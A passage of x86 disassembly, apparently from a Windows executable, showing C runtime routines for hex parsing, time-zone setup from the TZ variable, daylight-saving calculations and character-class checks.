mov eax, [ebp+arg_0]
push eax
call ds:dword_4943F0
loc_42B95E: ; CODE XREF: sub_42B7E0+13C�j
mov esp, ebp
pop ebp
retn 10h
sub_42B7E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B970 proc near ; CODE XREF: sub_42B010+A�p
; sub_42B3C0+A�p ...
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], 0
loc_42B97D: ; CODE XREF: sub_42B970+6D�j
mov eax, [ebp+arg_0]
mov cl, [eax]
mov [ebp+var_8], cl
movsx edx, [ebp+var_8]
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
test edx, edx
jz short loc_42B9DF
movsx ecx, [ebp+var_8]
cmp ecx, 61h
jl short loc_42B9B2
movsx edx, [ebp+var_8]
cmp edx, 66h
jg short loc_42B9B2
mov al, [ebp+var_8]
add al, 0D9h
mov [ebp+var_8], al
jmp short loc_42B9CC
; ---------------------------------------------------------------------------
loc_42B9B2: ; CODE XREF: sub_42B970+2D�j
; sub_42B970+36�j
movsx ecx, [ebp+var_8]
cmp ecx, 41h
jl short loc_42B9CC
movsx edx, [ebp+var_8]
cmp edx, 46h
jg short loc_42B9CC
mov al, [ebp+var_8]
add al, 0F9h
mov [ebp+var_8], al
loc_42B9CC: ; CODE XREF: sub_42B970+40�j
; sub_42B970+49�j ...
mov ecx, [ebp+var_4]
shl ecx, 4
movsx edx, [ebp+var_8]
lea eax, [ecx+edx-30h]
mov [ebp+var_4], eax
jmp short loc_42B97D
; ---------------------------------------------------------------------------
loc_42B9DF: ; CODE XREF: sub_42B970+24�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_42B970 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B9F0 proc near ; CODE XREF: sub_42AF50+60�p
; sub_42B340+39�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov cl, [eax]
mov [ebp+var_4], cl
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
loc_42BA0E: ; CODE XREF: sub_42B9F0+5C�j
movsx eax, [ebp+var_4]
cmp eax, 41h
jl short loc_42BA20
movsx ecx, [ebp+var_4]
cmp ecx, 5Ah
jle short loc_42BA32
loc_42BA20: ; CODE XREF: sub_42B9F0+25�j
movsx edx, [ebp+var_4]
cmp edx, 61h
jl short loc_42BA4E
movsx eax, [ebp+var_4]
cmp eax, 7Ah
jg short loc_42BA4E
loc_42BA32: ; CODE XREF: sub_42B9F0+2E�j
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov al, [edx]
mov [ebp+var_4], al
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
jmp short loc_42BA0E
; ---------------------------------------------------------------------------
loc_42BA4E: ; CODE XREF: sub_42B9F0+37�j
; sub_42B9F0+40�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_42B9F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BA60 proc near ; CODE XREF: sub_423ED0+8A�p
; sub_42E360:loc_42E87B�p
push ebp
mov ebp, esp
cmp dword_4923E8, 0
jnz short loc_42BA9B
push 0Bh
call sub_41BC90
add esp, 4
cmp dword_4923E8, 0
jnz short loc_42BA91
call sub_42BAC0
mov eax, dword_4923E8
add eax, 1
mov dword_4923E8, eax
loc_42BA91: ; CODE XREF: sub_42BA60+1D�j
push 0Bh
call sub_41BD30
add esp, 4
loc_42BA9B: ; CODE XREF: sub_42BA60+A�j
pop ebp
retn
sub_42BA60 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0Bh
call sub_41BC90
add esp, 4
call sub_42BAC0
push 0Bh
call sub_41BD30
add esp, 4
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BAC0 proc near ; CODE XREF: sub_42BA60+1F�p
; .text:0042BAAD�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 0
push 0Ch
call sub_41BC90
add esp, 4
mov dword_492330, 0
mov dword_443F70, 0FFFFFFFFh
mov eax, dword_443F70
mov dword_443F60, eax
push offset aTz ; "TZ"
call sub_42F770
add esp, 4
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz loc_42BC43
push 0Ch
call sub_41BD30
add esp, 4
push offset dword_492338
call ds:dword_49441C
cmp eax, 0FFFFFFFFh
jz loc_42BC3E
mov dword_492330, 1
mov ecx, dword_492338
imul ecx, 3Ch
mov dword_443EC8, ecx
xor edx, edx
mov dx, word_49237E
test edx, edx
jz short loc_42BB69
mov eax, dword_49238C
imul eax, 3Ch
mov ecx, dword_443EC8
add ecx, eax
mov dword_443EC8, ecx
loc_42BB69: ; CODE XREF: sub_42BAC0+91�j
xor edx, edx
mov dx, word_4923D2
test edx, edx
jz short loc_42BB9E
cmp dword_4923E0, 0
jz short loc_42BB9E
mov dword_443ECC, 1
mov eax, dword_4923E0
sub eax, dword_49238C
imul eax, 3Ch
mov dword_443ED0, eax
jmp short loc_42BBB2
; ---------------------------------------------------------------------------
loc_42BB9E: ; CODE XREF: sub_42BAC0+B4�j
; sub_42BAC0+BD�j
mov dword_443ECC, 0
mov dword_443ED0, 0
loc_42BBB2: ; CODE XREF: sub_42BAC0+DC�j
lea ecx, [ebp+var_8]
push ecx
push 0
push 3Fh
mov edx, off_443F54
push edx
push 0FFFFFFFFh
push offset dword_49233C
push 220h
mov eax, dword_492180
push eax
call ds:dword_4943B0
test eax, eax
jz short loc_42BBEF
cmp [ebp+var_8], 0
jnz short loc_42BBEF
mov ecx, off_443F54
mov byte ptr [ecx+3Fh], 0
jmp short loc_42BBF8
; ---------------------------------------------------------------------------
loc_42BBEF: ; CODE XREF: sub_42BAC0+11B�j
; sub_42BAC0+121�j
mov edx, off_443F54
mov byte ptr [edx], 0
loc_42BBF8: ; CODE XREF: sub_42BAC0+12D�j
lea eax, [ebp+var_8]
push eax
push 0
push 3Fh
mov ecx, off_443F58
push ecx
push 0FFFFFFFFh
push offset dword_492390
push 220h
mov edx, dword_492180
push edx
call ds:dword_4943B0
test eax, eax
jz short loc_42BC35
cmp [ebp+var_8], 0
jnz short loc_42BC35
mov eax, off_443F58
mov byte ptr [eax+3Fh], 0
jmp short loc_42BC3E
; ---------------------------------------------------------------------------
loc_42BC35: ; CODE XREF: sub_42BAC0+162�j
; sub_42BAC0+168�j
mov ecx, off_443F58
mov byte ptr [ecx], 0
loc_42BC3E: ; CODE XREF: sub_42BAC0+67�j
; sub_42BAC0+173�j
jmp loc_42BE67
; ---------------------------------------------------------------------------
loc_42BC43: ; CODE XREF: sub_42BAC0+49�j
mov edx, [ebp+var_C]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_42BC6D
cmp dword_4923E4, 0
jz short loc_42BC7C
mov ecx, dword_4923E4
push ecx
mov edx, [ebp+var_C]
push edx
call sub_419360
add esp, 8
test eax, eax
jnz short loc_42BC7C
loc_42BC6D: ; CODE XREF: sub_42BAC0+18B�j
push 0Ch
call sub_41BD30
add esp, 4
jmp loc_42BE67
; ---------------------------------------------------------------------------
loc_42BC7C: ; CODE XREF: sub_42BAC0+194�j
; sub_42BAC0+1AB�j
push 2
mov eax, dword_4923E4
push eax
call sub_4174C0
add esp, 8
push 10Ch
push offset aTzset_c ; "tzset.c"
push 2
mov ecx, [ebp+var_C]
push ecx
call sub_418E70
add esp, 4
add eax, 1
push eax
call sub_416A30
add esp, 10h
mov dword_4923E4, eax
cmp dword_4923E4, 0
jnz short loc_42BCCD
push 0Ch
call sub_41BD30
add esp, 4
jmp loc_42BE67
; ---------------------------------------------------------------------------
loc_42BCCD: ; CODE XREF: sub_42BAC0+1FC�j
mov edx, [ebp+var_C]
push edx
mov eax, dword_4923E4
push eax
call sub_419FA0
add esp, 8
push 0Ch
call sub_41BD30
add esp, 4
push 3
mov ecx, [ebp+var_C]
push ecx
mov edx, off_443F54
push edx
call sub_4191A0
add esp, 0Ch
mov eax, off_443F54
mov byte ptr [eax+3], 0
mov ecx, [ebp+var_C]
add ecx, 3
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
movsx eax, byte ptr [edx]
cmp eax, 2Dh
jnz short loc_42BD2D
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
loc_42BD2D: ; CODE XREF: sub_42BAC0+259�j
mov eax, [ebp+var_C]
push eax
call sub_4194F0
add esp, 4
imul eax, 0E10h
mov dword_443EC8, eax
loc_42BD44: ; CODE XREF: sub_42BAC0+2AE�j
mov ecx, [ebp+var_C]
movsx edx, byte ptr [ecx]
cmp edx, 2Bh
jz short loc_42BD65
mov eax, [ebp+var_C]
movsx ecx, byte ptr [eax]
cmp ecx, 30h
jl short loc_42BD70
mov edx, [ebp+var_C]
movsx eax, byte ptr [edx]
cmp eax, 39h
jg short loc_42BD70
loc_42BD65: ; CODE XREF: sub_42BAC0+28D�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
jmp short loc_42BD44
; ---------------------------------------------------------------------------
loc_42BD70: ; CODE XREF: sub_42BAC0+298�j
; sub_42BAC0+2A3�j
mov edx, [ebp+var_C]
movsx eax, byte ptr [edx]
cmp eax, 3Ah
jnz loc_42BE15
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
push edx
call sub_4194F0
add esp, 4
imul eax, 3Ch
mov ecx, dword_443EC8
add ecx, eax
mov dword_443EC8, ecx
loc_42BDA5: ; CODE XREF: sub_42BAC0+304�j
mov edx, [ebp+var_C]
movsx eax, byte ptr [edx]
cmp eax, 30h
jl short loc_42BDC6
mov ecx, [ebp+var_C]
movsx edx, byte ptr [ecx]
cmp edx, 39h
jg short loc_42BDC6
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_42BDA5
; ---------------------------------------------------------------------------
loc_42BDC6: ; CODE XREF: sub_42BAC0+2EE�j
; sub_42BAC0+2F9�j
mov ecx, [ebp+var_C]
movsx edx, byte ptr [ecx]
cmp edx, 3Ah
jnz short loc_42BE15
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
push ecx
call sub_4194F0
add esp, 4
mov edx, dword_443EC8
add edx, eax
mov dword_443EC8, edx
loc_42BDF4: ; CODE XREF: sub_42BAC0+353�j
mov eax, [ebp+var_C]
movsx ecx, byte ptr [eax]
cmp ecx, 30h
jl short loc_42BE15
mov edx, [ebp+var_C]
movsx eax, byte ptr [edx]
cmp eax, 39h
jg short loc_42BE15
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
jmp short loc_42BDF4
; ---------------------------------------------------------------------------
loc_42BE15: ; CODE XREF: sub_42BAC0+2B9�j
; sub_42BAC0+30F�j ...
cmp [ebp+var_4], 0
jz short loc_42BE29
mov edx, dword_443EC8
neg edx
mov dword_443EC8, edx
loc_42BE29: ; CODE XREF: sub_42BAC0+359�j
mov eax, [ebp+var_C]
movsx ecx, byte ptr [eax]
mov dword_443ECC, ecx
cmp dword_443ECC, 0
jz short loc_42BE5E
push 3
mov edx, [ebp+var_C]
push edx
mov eax, off_443F58
push eax
call sub_4191A0
add esp, 0Ch
mov ecx, off_443F58
mov byte ptr [ecx+3], 0
jmp short loc_42BE67
; ---------------------------------------------------------------------------
loc_42BE5E: ; CODE XREF: sub_42BAC0+37C�j
mov edx, off_443F58
mov byte ptr [edx], 0
loc_42BE67: ; CODE XREF: sub_42BAC0:loc_42BC3E�j
; sub_42BAC0+1B7�j ...
mov esp, ebp
pop ebp
retn
sub_42BAC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BE70 proc near ; CODE XREF: sub_423ED0+CF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 0Bh
call sub_41BC90
add esp, 4
mov eax, [ebp+arg_0]
push eax
call sub_42BEA0
add esp, 4
mov [ebp+var_4], eax
push 0Bh
call sub_41BD30
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_42BE70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BEA0 proc near ; CODE XREF: sub_42BE70+12�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_443ECC, 0
jnz short loc_42BEB4
xor eax, eax
jmp loc_42C196
; ---------------------------------------------------------------------------
loc_42BEB4: ; CODE XREF: sub_42BEA0+B�j
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
cmp ecx, dword_443F60
jnz short loc_42BED4
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
cmp eax, dword_443F70
jz loc_42C09B
loc_42BED4: ; CODE XREF: sub_42BEA0+20�j
cmp dword_492330, 0
jz loc_42C055
xor ecx, ecx
mov cx, word_4923D0
test ecx, ecx
jnz short loc_42BF49
xor edx, edx
mov dx, word_4923DE
push edx
xor eax, eax
mov ax, word_4923DC
push eax
xor ecx, ecx
mov cx, word_4923DA
push ecx
xor edx, edx
mov dx, word_4923D8
push edx
push 0
xor eax, eax
mov ax, word_4923D4
push eax
xor ecx, ecx
mov cx, word_4923D6
push ecx
xor edx, edx
mov dx, word_4923D2
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
push ecx
push 1
push 1
call sub_42C1A0
add esp, 2Ch
jmp short loc_42BF9A
; ---------------------------------------------------------------------------
loc_42BF49: ; CODE XREF: sub_42BEA0+4C�j
xor edx, edx
mov dx, word_4923DE
push edx
xor eax, eax
mov ax, word_4923DC
push eax
xor ecx, ecx
mov cx, word_4923DA
push ecx
xor edx, edx
mov dx, word_4923D8
push edx
xor eax, eax
mov ax, word_4923D6
push eax
push 0
push 0
xor ecx, ecx
mov cx, word_4923D2
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
push eax
push 0
push 1
call sub_42C1A0
add esp, 2Ch
loc_42BF9A: ; CODE XREF: sub_42BEA0+A7�j
xor ecx, ecx
mov cx, word_49237C
test ecx, ecx
jnz short loc_42C002
xor edx, edx
mov dx, word_49238A
push edx
xor eax, eax
mov ax, word_492388
push eax
xor ecx, ecx
mov cx, word_492386
push ecx
xor edx, edx
mov dx, word_492384
push edx
push 0
xor eax, eax
mov ax, word_492380
push eax
xor ecx, ecx
mov cx, word_492382
push ecx
xor edx, edx
mov dx, word_49237E
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
push ecx
push 1
push 0
call sub_42C1A0
add esp, 2Ch
jmp short loc_42C053
; ---------------------------------------------------------------------------
loc_42C002: ; CODE XREF: sub_42BEA0+105�j
xor edx, edx
mov dx, word_49238A
push edx
xor eax, eax
mov ax, word_492388
push eax
xor ecx, ecx
mov cx, word_492386
push ecx
xor edx, edx
mov dx, word_492384
push edx
xor eax, eax
mov ax, word_492382
push eax
push 0
push 0
xor ecx, ecx
mov cx, word_49237E
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
push eax
push 0
push 0
call sub_42C1A0
add esp, 2Ch
loc_42C053: ; CODE XREF: sub_42BEA0+160�j
jmp short loc_42C09B
; ---------------------------------------------------------------------------
loc_42C055: ; CODE XREF: sub_42BEA0+3B�j
push 0
push 0
push 0
push 2
push 0
push 0
push 1
push 4
mov ecx, [ebp+arg_0]
mov edx, [ecx+14h]
push edx
push 1
push 1
call sub_42C1A0
add esp, 2Ch
push 0
push 0
push 0
push 2
push 0
push 0
push 5
push 0Ah
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
push ecx
push 1
push 0
call sub_42C1A0
add esp, 2Ch
loc_42C09B: ; CODE XREF: sub_42BEA0+2E�j
; sub_42BEA0:loc_42C053�j
mov edx, dword_443F64
cmp edx, dword_443F74
jge short loc_42C0F4
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp ecx, dword_443F64
jl short loc_42C0C5
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp eax, dword_443F74
jle short loc_42C0CC
loc_42C0C5: ; CODE XREF: sub_42BEA0+215�j
xor eax, eax
jmp loc_42C196
; ---------------------------------------------------------------------------
loc_42C0CC: ; CODE XREF: sub_42BEA0+223�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
cmp edx, dword_443F64
jle short loc_42C0F2
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp ecx, dword_443F74
jge short loc_42C0F2
mov eax, 1
jmp loc_42C196
; ---------------------------------------------------------------------------
loc_42C0F2: ; CODE XREF: sub_42BEA0+238�j
; sub_42BEA0+246�j
jmp short loc_42C137
; ---------------------------------------------------------------------------
loc_42C0F4: ; CODE XREF: sub_42BEA0+207�j
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp eax, dword_443F74
jl short loc_42C110
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
cmp edx, dword_443F64
jle short loc_42C117
loc_42C110: ; CODE XREF: sub_42BEA0+260�j
mov eax, 1
jmp short loc_42C196
; ---------------------------------------------------------------------------
loc_42C117: ; CODE XREF: sub_42BEA0+26E�j
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp ecx, dword_443F74
jle short loc_42C137
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp eax, dword_443F64
jge short loc_42C137
xor eax, eax
jmp short loc_42C196
; ---------------------------------------------------------------------------
loc_42C137: ; CODE XREF: sub_42BEA0:loc_42C0F2�j
; sub_42BEA0+283�j ...
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
imul edx, 3Ch
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, edx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
imul eax, 0E10h
add ecx, eax
imul ecx, 3E8h
mov [ebp+var_4], ecx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
cmp edx, dword_443F64
jnz short loc_42C182
mov eax, [ebp+var_4]
cmp eax, dword_443F68
jl short loc_42C17E
mov eax, 1
jmp short loc_42C196
; ---------------------------------------------------------------------------
loc_42C17E: ; CODE XREF: sub_42BEA0+2D5�j
xor eax, eax
jmp short loc_42C196
; ---------------------------------------------------------------------------
loc_42C182: ; CODE XREF: sub_42BEA0+2CA�j
mov ecx, [ebp+var_4]
cmp ecx, dword_443F78
jge short loc_42C194
mov eax, 1
jmp short loc_42C196
; ---------------------------------------------------------------------------
loc_42C194: ; CODE XREF: sub_42BEA0+2EB�j
xor eax, eax
loc_42C196: ; CODE XREF: sub_42BEA0+F�j
; sub_42BEA0+227�j ...
mov esp, ebp
pop ebp
retn
sub_42BEA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C1A0 proc near ; CODE XREF: sub_42BEA0+9F�p
; sub_42BEA0+F2�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
sub esp, 14h
cmp [ebp+arg_4], 1
jnz loc_42C27C
mov eax, [ebp+arg_8]
and eax, 3
test eax, eax
jnz short loc_42C1C9
mov ecx, [ebp+arg_C]
mov edx, dword_443F78[ecx*4]
mov [ebp+var_C], edx
jmp short loc_42C1D6
; ---------------------------------------------------------------------------
loc_42C1C9: ; CODE XREF: sub_42C1A0+18�j
mov eax, [ebp+arg_C]
mov ecx, dword_443FAC[eax*4]
mov [ebp+var_C], ecx
loc_42C1D6: ; CODE XREF: sub_42C1A0+27�j
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_8], edx
mov eax, [ebp+arg_8]
sub eax, 46h
imul eax, 16Dh
mov ecx, [ebp+var_8]
add ecx, eax
mov edx, [ebp+arg_8]
sub edx, 1
sar edx, 2
lea eax, [ecx+edx-0Dh]
cdq
mov ecx, 7
idiv ecx
mov [ebp+var_4], edx
mov edx, [ebp+var_4]
cmp edx, [ebp+arg_14]
jge short loc_42C229
mov eax, [ebp+arg_14]
sub eax, [ebp+var_4]
mov ecx, [ebp+arg_10]
sub ecx, 1
imul ecx, 7
add ecx, [ebp+var_8]
add ecx, eax
mov [ebp+var_8], ecx
jmp short loc_42C23D
; ---------------------------------------------------------------------------
loc_42C229: ; CODE XREF: sub_42C1A0+6E�j
mov edx, [ebp+arg_14]
sub edx, [ebp+var_4]
mov eax, [ebp+arg_10]
imul eax, 7
add eax, [ebp+var_8]
add eax, edx
mov [ebp+var_8], eax
loc_42C23D: ; CODE XREF: sub_42C1A0+87�j
cmp [ebp+arg_10], 5
jnz short loc_42C27A
mov ecx, [ebp+arg_8]
and ecx, 3
test ecx, ecx
jnz short loc_42C25C
mov edx, [ebp+arg_C]
mov eax, dword_443F7C[edx*4]
mov [ebp+var_10], eax
jmp short loc_42C269
; ---------------------------------------------------------------------------
loc_42C25C: ; CODE XREF: sub_42C1A0+AB�j
mov ecx, [ebp+arg_C]
mov edx, dword_443FB0[ecx*4]
mov [ebp+var_10], edx
loc_42C269: ; CODE XREF: sub_42C1A0+BA�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_10]
jle short loc_42C27A
mov ecx, [ebp+var_8]
sub ecx, 7
mov [ebp+var_8], ecx
loc_42C27A: ; CODE XREF: sub_42C1A0+A1�j
; sub_42C1A0+CF�j
jmp short loc_42C2B1
; ---------------------------------------------------------------------------
loc_42C27C: ; CODE XREF: sub_42C1A0+A�j
mov edx, [ebp+arg_8]
and edx, 3
test edx, edx
jnz short loc_42C295
mov eax, [ebp+arg_C]
mov ecx, dword_443F78[eax*4]
mov [ebp+var_14], ecx
jmp short loc_42C2A2
; ---------------------------------------------------------------------------
loc_42C295: ; CODE XREF: sub_42C1A0+E4�j
mov edx, [ebp+arg_C]
mov eax, dword_443FAC[edx*4]
mov [ebp+var_14], eax
loc_42C2A2: ; CODE XREF: sub_42C1A0+F3�j
mov ecx, [ebp+var_14]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
add edx, [ebp+arg_18]
mov [ebp+var_8], edx
loc_42C2B1: ; CODE XREF: sub_42C1A0:loc_42C27A�j
cmp [ebp+arg_0], 1
jnz short loc_42C2F1
mov eax, [ebp+var_8]
mov dword_443F64, eax
mov ecx, [ebp+arg_1C]
imul ecx, 3Ch
mov edx, [ebp+arg_20]
add edx, ecx
imul edx, 3Ch
mov eax, [ebp+arg_24]
add eax, edx
imul eax, 3E8h
mov ecx, [ebp+arg_28]
add ecx, eax
mov dword_443F68, ecx
mov edx, [ebp+arg_8]
mov dword_443F60, edx
jmp loc_42C394
; ---------------------------------------------------------------------------
loc_42C2F1: ; CODE XREF: sub_42C1A0+115�j
mov eax, [ebp+var_8]
mov dword_443F74, eax
mov ecx, [ebp+arg_1C]
imul ecx, 3Ch
mov edx, [ebp+arg_20]
add edx, ecx
imul edx, 3Ch
mov eax, [ebp+arg_24]
add eax, edx
imul eax, 3E8h
mov ecx, [ebp+arg_28]
add ecx, eax
mov dword_443F78, ecx
mov edx, dword_443ED0
imul edx, 3E8h
mov eax, dword_443F78
add eax, edx
mov dword_443F78, eax
cmp dword_443F78, 0
jge short loc_42C361
mov ecx, dword_443F78
add ecx, 5265C00h
mov dword_443F78, ecx
mov edx, dword_443F74
sub edx, 1
mov dword_443F74, edx
jmp short loc_42C38B
; ---------------------------------------------------------------------------
loc_42C361: ; CODE XREF: sub_42C1A0+19C�j
cmp dword_443F78, 5265C00h
jl short loc_42C38B
mov eax, dword_443F78
sub eax, 5265C00h
mov dword_443F78, eax
mov ecx, dword_443F74
add ecx, 1
mov dword_443F74, ecx
loc_42C38B: ; CODE XREF: sub_42C1A0+1BF�j
; sub_42C1A0+1CB�j
mov edx, [ebp+arg_8]
mov dword_443F70, edx
loc_42C394: ; CODE XREF: sub_42C1A0+14C�j
mov esp, ebp
pop ebp
retn
sub_42C1A0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
push 0
mov eax, [ebp+8]
push eax
call sub_42C520
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 3
push 0
mov eax, [ebp+8]
push eax
call sub_42C520
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 2
push 0
mov eax, [ebp+8]
push eax
call sub_42C520
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
push 107h
mov eax, [ebp+8]
push eax
call sub_42C520
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
push 103h
mov eax, [ebp+8]
push eax
call sub_42C520
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 3
push 117h
mov eax, [ebp+8]
push eax
call sub_42C520
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 3
push 157h
mov eax, [ebp+8]
push eax
call sub_42C520
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 2
push 10h
mov eax, [ebp+8]
push eax
call sub_42C520
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C4A0 proc near ; CODE XREF: sub_425180+4E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push 0
mov eax, [ebp+arg_0]
push eax
call sub_42C520
add esp, 0Ch
pop ebp
retn
sub_42C4A0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 8
push 0
mov eax, [ebp+8]
push eax
call sub_42C520
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_492524, 3A4h
jnz short loc_42C50D
push 3
push 0
mov eax, [ebp+8]
push eax
call sub_42C520
add esp, 0Ch
test eax, eax
jz short loc_42C50D
mov dword ptr [ebp-4], 1
jmp short loc_42C514
; ---------------------------------------------------------------------------
loc_42C50D: ; CODE XREF: .text:0042C4EE�j
; .text:0042C502�j
mov dword ptr [ebp-4], 0
loc_42C514: ; CODE XREF: .text:0042C50B�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C520 proc near ; CODE XREF: .text:0042C3AB�p
; .text:0042C3CB�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
and eax, 0FFh
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_0]
xor edx, edx
mov dl, byte_492641[ecx]
and edx, [ebp+arg_8]
test edx, edx
jnz short loc_42C574
cmp [ebp+arg_4], 0
jz short loc_42C55E
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cx, word_442D56[eax*2]
and ecx, [ebp+arg_4]
mov [ebp+var_4], ecx
jmp short loc_42C565
; ---------------------------------------------------------------------------
loc_42C55E: ; CODE XREF: sub_42C520+27�j
mov [ebp+var_4], 0
loc_42C565: ; CODE XREF: sub_42C520+3C�j
cmp [ebp+var_4], 0
jnz short loc_42C574
mov [ebp+var_8], 0
jmp short loc_42C57B
; ---------------------------------------------------------------------------
loc_42C574: ; CODE XREF: sub_42C520+21�j
; sub_42C520+49�j
mov [ebp+var_8], 1
loc_42C57B: ; CODE XREF: sub_42C520+52�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_42C520 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+8]
cmp eax, dword_492520
jnb short loc_42C5C1
mov ecx, [ebp+8]
sar ecx, 5
mov edx, [ebp+8]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_42C5D1
loc_42C5C1: ; CODE XREF: .text:0042C59D�j
call sub_422F20
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp short loc_42C5FF
; ---------------------------------------------------------------------------
loc_42C5D1: ; CODE XREF: .text:0042C5BF�j
mov edx, [ebp+8]
push edx
call sub_4280C0
add esp, 4
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call sub_42C610
add esp, 8
mov [ebp-4], eax
mov edx, [ebp+8]
push edx
call sub_428150
add esp, 4
mov eax, [ebp-4]
